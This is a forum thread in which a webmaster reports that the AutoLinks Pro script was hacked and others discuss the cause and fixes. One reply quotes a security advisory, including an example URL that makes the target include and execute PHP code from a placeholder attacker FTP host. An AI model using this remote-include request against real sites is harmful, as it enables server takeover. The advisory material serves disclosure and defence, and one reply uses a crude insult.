|
Autolinks Pro hacked - who knows help?
:helpme Hey guys,
there is a security vulnerability in Autolinks Pro. Hackers can get access to your server and install scripts to attack other servers. http://www.securitytracker.com/alert...g/1014815.html Anyone who has the same problems? Does anyone know a solution? Please help! :helpme Peggy ICQ: 307824338 |
We do not use php with our version of AG pro.
It's cgi ?? |
Set your register_globals off in php.ini. :thumbsup
|
Description: A vulnerability was reported in AutoLinks Pro. A remote user can execute arbitrary code on the target system.
The software does not properly validate user-supplied input in the 'alpath' parameter. If register_globals is set to 'on' in the 'php.ini' configuration file, a remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service. The flaw resides in 'autolinks/al_initialize.php'. http://[target]/al_initialize.php?alpath=ftp://[attacker]/ The above URL will cause the PHP code in the 'al_functions.php' file on the 'attacker' FTP site to be executed on the target system. Whats your website? :) |
|
wow, basic shit ... retarded ...
|
FYI, this has nothing to do with register globals, vars are still picked up, it's just a remote include
|
| All times are GMT -7. The time now is 08:14 PM. |
Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc123